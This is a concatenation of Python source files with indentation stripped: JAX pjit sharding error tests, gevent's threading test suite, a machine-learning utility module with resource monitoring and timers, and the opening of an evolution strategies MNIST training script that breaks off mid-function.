@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLinearizeNotImplemented(self):
# pending https://github.com/google/jax/pull/6876
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
with self.assertRaisesRegex(NotImplementedError, "6876"):
jax.linearize(f, x, y)
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
test_threading_2.py
|
# testing gevent's Event, Lock, RLock, Semaphore, BoundedSemaphore with standard test_threading
from __future__ import with_statement
setup_ = '''from gevent import monkey; monkey.patch_all()
from gevent.event import Event
from gevent.lock import RLock, Semaphore, BoundedSemaphore
from gevent.thread import allocate_lock as Lock
import threading
threading.Event = Event
threading.Lock = Lock
threading.RLock = RLock
threading.Semaphore = Semaphore
threading.BoundedSemaphore = BoundedSemaphore
if not hasattr(threading, 'current_thread'):
threading.current_thread = threading.currentThread
if not hasattr(threading.Thread, 'name'):
threading.Thread.name = property(lambda self: self.getName())
if not hasattr(threading.Thread, 'is_alive'):
threading.Thread.is_alive = threading.Thread.isAlive
if not hasattr(threading.Thread, 'daemon'):
threading.Thread.daemon = property(threading.Thread.isDaemon, threading.Thread.setDaemon)
if not hasattr(threading._Condition, 'notify_all'):
threading._Condition.notify_all = threading._Condition.notifyAll
'''
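# setup_ is exec'd in this process; setup_3/setup_4/setup_5 below are indented
# copies for embedding into the subprocess scripts used by later tests.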
exec setup_
setup_3 = '\n'.join(' %s' % line for line in setup_.split('\n'))
setup_4 = '\n'.join(' %s' % line for line in setup_.split('\n'))
setup_5 = '\n'.join(' %s' % line for line in setup_.split('\n'))
import test.test_support
from test.test_support import verbose
import random
import re
import sys
import threading
import thread
import time
import unittest
import weakref
import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>" % i, self, sema, mutex, numrunning)
threads.append(t)
if hasattr(t, 'ident'):
self.failUnlessEqual(t.ident, None)
self.assert_(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.is_alive())
if hasattr(t, 'ident'):
self.failIfEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assert_(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
if sys.version_info[:2] > (2, 5):
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
        # in gevent, we actually clean up threading._active, but that hasn't happened here yet
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def SKIP_test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
if sys.version_info[:2] > (2, 5):
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
if sys.version_info[:2] > (2, 5):
        def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
%s
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""" % setup_4])
self.assertEqual(rc, 42)
if sys.version_info[:2] > (2, 5):
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
import subprocess
p = subprocess.Popen([sys.executable, "-c", """if 1:
%s
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
""" % setup_5],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
stdout = stdout.strip()
assert re.match('^Woke up, sleep function is: <.*?sleep.*?>$', stdout), repr(stdout)
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
if sys.version_info[:2] > (2, 5):
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another': self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEquals(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEquals(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(unittest.TestCase):
def _run_and_join(self, script):
script = """if 1:
%s
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" % setup_3 + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
# skip disable because I think the bug shouldn't apply to gevent -- denis
#if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
# print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
# ' due to known OS bugs on'), sys.platform
# return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(unittest.TestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
def main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
main()
|
fn.py
|
import warnings
from typing import List
import os
import re
import random
import time
import multiprocessing as mp
import psutil
import numpy as np
import torch
from prettytable import PrettyTable
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
def seed_everything(seed=1000):
"""seed everything to reproduce your experiments
:param int seed: default 1000
:return: None
"""
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
def set_devices(device_ids: List[int]):
"""setting the global environment of CUDA
:param device_ids: list of device id, [-1] is cpu
:return: torch.device
"""
    if not isinstance(device_ids, list):
        raise TypeError(f'the gpus type should be List[int], not {type(device_ids)}')
if len(device_ids) > 1:
warnings.warn(f'we only support cpu or single gpu now, '
f'but you input {len(device_ids)} device id, and only the first will be used')
os.environ['CUDA_VISIBLE_DEVICES'] = str(device_ids[0])
if device_ids[0] != -1:
print(f'Training on GPU {device_ids}')
return torch.device('cuda')
else:
print('Training on CPU')
return torch.device('cpu')
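# Usage sketch (hypothetical values): pick GPU 0, or fall back to CPU with [-1].
#   device = set_devices([0])
#   model = MyModel().to(device)  # MyModel is a placeholder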
def count_params(model, show=False):
num_params = 0
if show:
for name, p in model.named_parameters():
print(f'{name}: {str(p.size())}')
num_params += p.numel()
else:
for name, p in model.named_parameters():
num_params += p.numel()
return num_params
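# Example (with `model` a placeholder nn.Module): counts every named parameter,
# trainable or not.
#   n = count_params(model)
#   print(f'{n / 1e6:.2f}M parameters')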
def format_runTime(seconds: float):
    """format running time to `day hours:minutes:seconds`
    :param seconds: typically the difference between two time.time() calls
    :return: formatted string
    """
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
h = '0' + str(int(h)) if h < 10 else str(int(h))
m = '0' + str(int(m)) if m < 10 else str(int(m))
s = '0' + str(int(s)) if s < 10 else str(int(s))
    if d == 0:
        return f'{h}:{m}:{s}'
    else:
        # d is still a float from divmod, so cast it to avoid printing '1.0d'
        return f'{int(d)}d {h}:{m}:{s}'
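# Worked example: format_runTime(90061) -> '1d 01:01:01'; format_runTime(125) -> '00:02:05'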
class ProcessStatus():
"""记录程序运行过程中GPU/CPU/内存的全局使用情况(不一定是主进程的实际使用情况,暂未实现进程跟踪功能)
>>> gpu = 0 # 指定0号GPU,或者为None,不指定GPU
>>> processStatus = ProcessStatus(gpu)
>>> p = mp.Process(target=processStatus.record_running_status, args=(1,))
>>> p.start() # 开始执行监控进程
>>> # 执行主进程,例如运行程序
>>> p.terminate() # 终结监控进程
>>> processStatus.print_statisticAnalysis() # 打印表信息
>>> processStatus.plot_running_info() # 打印图信息
"""
def __init__(self, gpu:int=None):
self.start = time.time()
self.running_info = mp.Manager().list()
self.gpu = gpu
        if gpu is not None:  # `if gpu:` would wrongly skip initialization for GPU 0
import pynvml
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(gpu)
gpu_info = pynvml.nvmlDeviceGetMemoryInfo(handle)
self.device_total_memory = round(gpu_info.total/1024**2) # MiB
self.driver_version = pynvml.nvmlSystemGetDriverVersion().decode('utf-8')
self.device_name = pynvml.nvmlDeviceGetName(handle).decode('utf-8')
pynvml.nvmlShutdown()
    def record_running_status(self, interval=1):
        """Meant to run in a separate process; monitors GPU, CPU and memory usage
        while the main program runs.
        :param interval: sampling interval in seconds, one record per interval (default 1)
        :return: runs forever, until the parent process terminates this child process
        """
        start = self.start
        if self.gpu is not None:  # a GPU was specified
import pynvml
pynvml.nvmlInit()
while True:
cur_time = time.time()
if cur_time - start >= interval:
start = cur_time
handle = pynvml.nvmlDeviceGetHandleByIndex(self.gpu)
gpu_info = pynvml.nvmlDeviceGetMemoryInfo(handle)
mem = psutil.virtual_memory()
self.running_info.append({
'cur_time': cur_time,
                        'gpu_used': round(gpu_info.used / 1024 ** 2, 2),  # GPU memory used (MiB)
                        'gpu_util': pynvml.nvmlDeviceGetUtilizationRates(handle).gpu,  # GPU utilization (0-100)
                        'cpu_util': psutil.cpu_percent(),  # CPU utilization (0.0-100.0)
                        'mem_util': mem.percent,  # RAM utilization (0.0-100.0)
                        'mem_used': round(mem.used / 1024 ** 2)  # RAM used (MiB)
})
        else:  # no GPU specified
while True:
cur_time = time.time()
if cur_time - start >= interval:
start = cur_time
mem = psutil.virtual_memory()
self.running_info.append({
'cur_time': cur_time,
                        'cpu_util': psutil.cpu_percent(),  # CPU utilization (0.0-100.0)
                        'mem_util': mem.percent,  # RAM utilization (0.0-100.0)
                        'mem_used': round(mem.used / 1024 ** 2)  # RAM used (MiB)
})
def print_statisticAnalysis(self):
"""统计分析程序运行时间以及GPU/CPU/内存使用情况,以表格形式呈现
"""
start = self.start
table = PrettyTable(['Param', 'Value'])
        if self.gpu is not None:  # a GPU was specified
table.add_row(['cuda version', torch.version.cuda])
table.add_row(['driver version', self.driver_version])
table.add_row(['device', self.device_name])
table.add_row(['device id', self.gpu])
table.add_row(['start time', time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(start))])
table.add_row(['end time', time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())])
table.add_row(['running time', format_runTime(time.time() - start)])
table.add_row(['device total memory', f'{self.device_total_memory} MiB'])
table.add_row(['device max used memory', f"{round(np.max([t['gpu_used'] for t in self.running_info]), 2)} MiB"])
table.add_row(['device avg util ratio', f"{round(np.mean([t['gpu_util'] for t in self.running_info]), 2)}%"])
        else:  # no GPU specified
table.add_row(['start time', time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(start))])
table.add_row(['end time', time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())])
table.add_row(['running time', format_runTime(time.time() - start)])
table.add_row(['cpu avg util ratio', f"{round(np.mean([t['cpu_util'] for t in self.running_info]), 2)}%"])
table.add_row(['memory max used', f"{round(np.max([t['mem_used'] for t in self.running_info]), 2)} MiB"])
table.add_row(['memory avg util ratio', f"{round(np.mean([t['mem_util'] for t in self.running_info]), 2)}%"])
table.align['Param'] = 'l'
table.align['Value'] = 'l'
print(table)
    def plot_running_info(self, show=False, saved_path='./status.png'):
        """Plot GPU/CPU/memory usage over the run. By default the figure is not
        shown, only saved to `saved_path`.
        :param show: whether to call plt.show() to display the figure
        :param saved_path: path where the figure is saved
        """
font = FontProperties()
font.set_family('serif')
font.set_name('Times New Roman')
font.set_style('normal')
font.set_size(12)
plt.style.use(['science', 'no-latex'])
plt.figure(figsize=(12, 12), dpi=300)
cur_time = [item['cur_time']-self.start for item in self.running_info]
cpu_util = [item['cpu_util'] for item in self.running_info]
mem_util = [item['mem_util'] for item in self.running_info]
mem_used = [item['mem_used'] for item in self.running_info]
        if self.gpu is not None:
gpu_used = [item['gpu_used'] for item in self.running_info]
gpu_util = [item['gpu_util'] for item in self.running_info]
ax = plt.subplot(2, 1, 1)
ax.plot(cur_time, gpu_util, label='gpu_util')
ax.plot(cur_time, cpu_util, label='cpu_util')
ax.plot(cur_time, mem_util, label='mem_util')
plt.xticks(font_properties=font)
plt.yticks(font_properties=font)
plt.gca().set_ylabel('percentage', font_properties=font, fontsize=16)
plt.legend()
ax = plt.subplot(2, 1, 2)
ax.plot(cur_time, gpu_used, label='gpu_used')
ax.plot(cur_time, mem_used, label='mem_used')
plt.xticks(font_properties=font)
plt.yticks(font_properties=font)
plt.gca().set_xlabel('time', font_properties=font, fontsize=16)
plt.gca().set_ylabel('capacity', font_properties=font, fontsize=16)
plt.legend()
plt.title("status", font_properties=font, fontsize=20)
else:
ax = plt.subplot(2, 1, 1)
ax.plot(cur_time, cpu_util, label='cpu_util')
ax.plot(cur_time, mem_util, label='mem_util')
plt.xticks(font_properties=font)
plt.yticks(font_properties=font)
plt.gca().set_ylabel('percentage', font_properties=font, fontsize=16)
plt.legend()
ax = plt.subplot(2, 1, 2)
ax.plot(cur_time, mem_used, label='mem_used')
plt.xticks(font_properties=font)
plt.yticks(font_properties=font)
plt.gca().set_xlabel('time', font_properties=font, fontsize=16)
plt.gca().set_ylabel('capacity', font_properties=font, fontsize=16)
plt.legend()
plt.title("status", font_properties=font, fontsize=20)
if show:
plt.show()
        if saved_path:
            plt.savefig(saved_path)
class Timer(object):
"""Computes elapsed time."""
def __init__(self, name):
self.name = name
self.running = True
self.total = 0
self.start = round(time.time(), 2)
self.intervalTime = round(time.time(), 2)
print("<> <> <> Starting Timer [{}] <> <> <>".format(self.name))
def reset(self):
self.running = True
self.total = 0
self.start = round(time.time(), 2)
return self
def interval(self, intervalName=''):
intervalTime = self._to_hms(round(time.time() - self.intervalTime, 2))
print("<> <> Timer [{}] <> <> Interval [{}]: {} <> <>".format(
self.name, intervalName, intervalTime))
self.intervalTime = round(time.time(), 2)
return intervalTime
def stop(self):
if self.running:
self.running = False
self.total += round(time.time() - self.start, 2)
return self
def resume(self):
if not self.running:
self.running = True
self.start = round(time.time(), 2)
return self
def time(self):
if self.running:
return round(self.total + time.time() - self.start, 2)
return self.total
def finish(self):
if self.running:
self.running = False
self.total += round(time.time() - self.start, 2)
elapsed = self._to_hms(self.total)
print("<> <> <> Finished Timer [{}] <> <> <> Total time elapsed: {} <> <> <>".format(self.name, elapsed))
return elapsed
def _to_hms(self, seconds):
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
return "%dh %02dm %02ds" % (h, m, s)
class Dict2Obj():
"""
    Convert a nested dict into an object, so that key access becomes attribute access.
>>> t = Dict2Obj()
>>> t.x1 = 3e-5
>>> t.x2.x21 = [8]
>>> t.x2.x22 = 16
>>> t.update({
>>> 'x3': 0.1,
>>> 'x2': {'x22': 32, 'x23': 64},
>>> 'x4': {'x41':'yyy'}
>>> })
>>> t.toDict() # {'x1': 3e-05, 'x2': {'x21': [8], 'x22': 32, 'x23': 64},
>>> # 'x3': 0.1, 'x4': {'x41': 'yyy'}}
>>> print(t) # str of t.toDict()
"""
def __init__(self, init_dict=None):
if init_dict:
for key, value in init_dict.items():
if self._is_valid(key):
if type(value) is dict:
self.__setattr__(key, Dict2Obj(value))
else:
self.__setattr__(key, value)
def __getattr__(self, key):
"""访问一个不存在的属性时,调用该函数"""
if self._is_valid(key):
self.__setattr__(key, Dict2Obj({}))
return self.__getattribute__(key)
def __repr__(self):
return str(self.toDict())
def update(self, aux_dict):
for key, value in aux_dict.items():
if self._is_valid(key):
if type(value) is dict:
if hasattr(self, key):
self.__getattribute__(key).update(value)
else:
self.__getattr__(key).update(value)
else:
self.__setattr__(key, value)
def _is_valid(self, key):
        if type(key) is str and re.fullmatch(r'[a-zA-Z_][0-9a-zA-Z_]*', key):  # fullmatch: reject partial matches like 'a-b'
return True
raise ValueError(f'{key} is not a valid variable, please check manually')
def toDict(self):
target = {}
for key, value in self.__dict__.items():
if type(value) is not Dict2Obj:
target[key] = value
else:
target[key] = value.toDict()
return target
|
mlp_es.py
|
"""
Evolutionary strategies implementation for training a neural network
"""
import time
import threading
import math
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import numpy as np
INPUT_DIMENSIONS = [28, 28, 1]
# Hyper params
BATCH_SIZE = 200
EPOCHS = 1500
POP_SIZE = 50
NUM_WORKERS = 2
# Display log messages after every LOG_FREQUENCY iterations during training
LOG_FREQUENCY = 1
# Some MLP networks - can be replaced with deeper MLPs or Covnets
def inference_1_layer_mlp(tp_input, reuse=False):
"""
Construct the neural network with just 1 layer
:tp_input: input placeholder
:return: output logits' expression
"""
with tf.variable_scope('mnist_es', reuse=reuse):
te_net = slim.fully_connected(tp_input, 10, activation_fn=None, reuse=reuse, scope='layer1')
return te_net
def inference_2_layer_mlp(tp_input, reuse=False):
"""
Construct the neural network with just 2 layers
:tp_input: input placeholder
:return: output logits' expression
"""
with tf.variable_scope('mnist_es', reuse=reuse):
te_net = slim.fully_connected(tp_input, 128, activation_fn=tf.nn.selu, reuse=reuse, scope='layer1')
